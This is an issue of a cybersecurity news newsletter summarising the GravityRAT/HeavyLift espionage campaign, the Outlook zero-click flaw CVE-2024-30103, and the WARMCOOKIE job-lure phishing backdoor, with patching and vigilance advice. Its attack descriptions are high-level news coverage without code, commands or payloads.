Android, Windows, Mac users beware

Jun 13 2024

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that’s reeling in the latest threats hook, line, and sinker! 🎣🎣🎣

Today’s hottest cybersecurity news stories:

  • πŸ₯Β πŸ“± Android, Windows, Mac users beware! Pakistani malware lurks πŸ•Œ

  • πŸ“§ Microsoft Outlook flaw discovered that would allow zero-click attack

  • 🎣 Phishermen are using WARMCOOKIE as bait in backdoor campaign

Welcome to Hackistan 😬😬😬

🚨 Pakistan-linked Malware: Operation Celestial Force β˜„οΈ

Threat actors tied to Pakistan have been orchestrating a malware campaign called Operation Celestial Force since 2018. This campaign uses Android malware GravityRAT and Windows malware loader HeavyLift, managed via GravityAdmin.

πŸ”’ Meet Cosmic Leopard

Cisco Talos tracks this adversary under the name Cosmic Leopard (aka SpaceCobra), showing tactical overlap with Transparent Tribe. The malware suite targets users in the Indian subcontinent, highlighting its success and ongoing evolution.

πŸ“± Multi-platform Threat

GravityRAT, first detected in 2018 as a Windows malware, now targets Android and macOS. It has been used to harvest sensitive info from military personnel in India and Pakistan Air Force, disguised as cloud storage, entertainment, and chat apps.

πŸ”— Coordinated Attacks

Cosmic Leopard employs spear-phishing and social engineering to lure targets into downloading GravityRAT or HeavyLift. GravityAdmin coordinates these attacks, with campaigns like 'FOXTROT' and 'CRAFTWITHME' marking specific operations.

πŸ–₯️ HeavyLift's Role

HeavyLift, a new addition, targets Windows systems via malicious installers. It gathers system data and checks a C2 server for new payloads, functioning similarly on macOS.

πŸ‘₯ Targeting Defense and Government

This campaign mainly targets Indian defence, government, and tech sectors. Researchers emphasise the sophistication and long-term persistence of this operation.

Stay alert and secure! πŸŒπŸ”’

Instantly calculate the time you can save by automating compliance

Whether you’re starting or scaling your security program, Vanta helps you automate compliance across frameworks like SOC 2, ISO 27001, ISO 42001, HIPAA, HITRUST CSF, NIST AI, and more.

Plus, you can streamline security reviews by automating questionnaires and demonstrating your security posture with a customer-facing Trust Center, all powered by Vanta AI.

Instantly calculate how much time you can save with Vanta.

[Calculate now]

Zero-clicks given πŸ’€πŸ’€πŸ’€

🚨 Zero-Click Vulnerability in Microsoft Outlook! πŸ’»

A serious zero-click remote code execution (RCE) vulnerability, CVE-2024-30103, has been discovered in Microsoft Outlook. This flaw allows attackers to run arbitrary code via a specially designed email, with no user interaction needed.

πŸ“§ Zero-Click Danger

CVE-2024-30103 is alarming because it doesn't require any action from the user. Just opening the malicious email is enough to compromise the system, making it a potent tool for cybercriminals.

πŸ›‘οΈ How It Works

Morphisec's analysis reveals that the vulnerability exploits the way Outlook processes certain email components. A buffer overflow is triggered when the crafted email is opened, allowing the attacker to execute arbitrary code with the user's privileges. This can lead to full system compromise, data theft, or malware spread.

🌍 Widespread Impact

With Microsoft Outlook's extensive use in both corporate and personal environments, CVE-2024-30103 poses a significant risk. Successful exploits could result in major data breaches, financial losses, and reputational damage for organisations.

πŸ”§ Mitigation Steps

Microsoft has released a security patch to fix this issue. Users and administrators should immediately apply the latest updates. Enhanced email filtering and monitoring solutions are also recommended to detect and block malicious emails.

πŸ’¬ Expert Advice

"Zero-click vulnerabilities are particularly dangerous due to their lack of user interaction," a Morphisec spokesperson noted. "Organisations must prioritise patching and adopt multi-layered security measures to defend against sophisticated threats."

🚨 Stay Informed and Protected

As of now, no known attacks exploiting CVE-2024-30103 are in the wild. Ensure your systems are updated and secure to mitigate risks from this critical vulnerability.

And that’s the way the WARMCOOKIE crumbles πŸͺπŸͺπŸͺ

🚨 Job Scam Alert: WARMCOOKIE Backdoor 🎣

Cybersecurity researchers have uncovered a phishing campaign using job-themed lures to deliver a Windows backdoor named WARMCOOKIE. This backdoor scouts victim networks to deploy additional payloads.

πŸ“§ How It Works

Emails from fake recruitment firms like Hays and Michael Page prompt recipients to click a link for job details. After solving a CAPTCHA, a JavaScript file is dropped, initiating the download of WARMCOOKIE via PowerShell.

πŸ›‘οΈ Capabilities and Tactics

WARMCOOKIE fingerprints infected machines, captures screenshots, and drops more malicious programs. It uses a hard-coded command-and-control IP address and RC4 key for communication. The attack is tracked as REF6127.

πŸ’» Technical Breakdown

  • The phishing URL, hosted on compromised infrastructure, redirects victims to a landing page.

  • The backdoor establishes persistence using a scheduled task and performs anti-analysis checks to avoid detection.

WARMCOOKIE’s functions include reading/writing files, executing commands via cmd.exe, fetching installed applications, and taking screenshots. It resembles tools used in prior campaigns targeting various sectors.

🌍 Global Reach

WARMCOOKIE is gaining popularity, targeting users worldwide. It’s part of sophisticated phishing campaigns exploiting familiar job recruitment themes to lure victims.

πŸ“œ Related Campaigns

Trustwave SpiderLabs detailed another campaign using invoice-themed decoys and Windows search functionality in HTML code to deploy malware. The emails contain a ZIP file with an HTML that exploits the "search:" protocol, displaying a Shortcut (LNK) file that can trigger malicious operations when clicked.

πŸ”— Stay Vigilant

While these attacks need user interaction, they cleverly exploit trust in familiar interfaces. Be cautious with email attachments and links, especially from unknown sources.

Stay alert and protect your systems! πŸŒπŸ”’

πŸ—žοΈ Extra, Extra! Read all about it! πŸ—žοΈ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • πŸ›‘οΈ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday πŸ“…

  • πŸ’΅Β Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for πŸ†“

  • πŸ“ˆΒ Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future πŸ‘Ύ

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter

Recent articles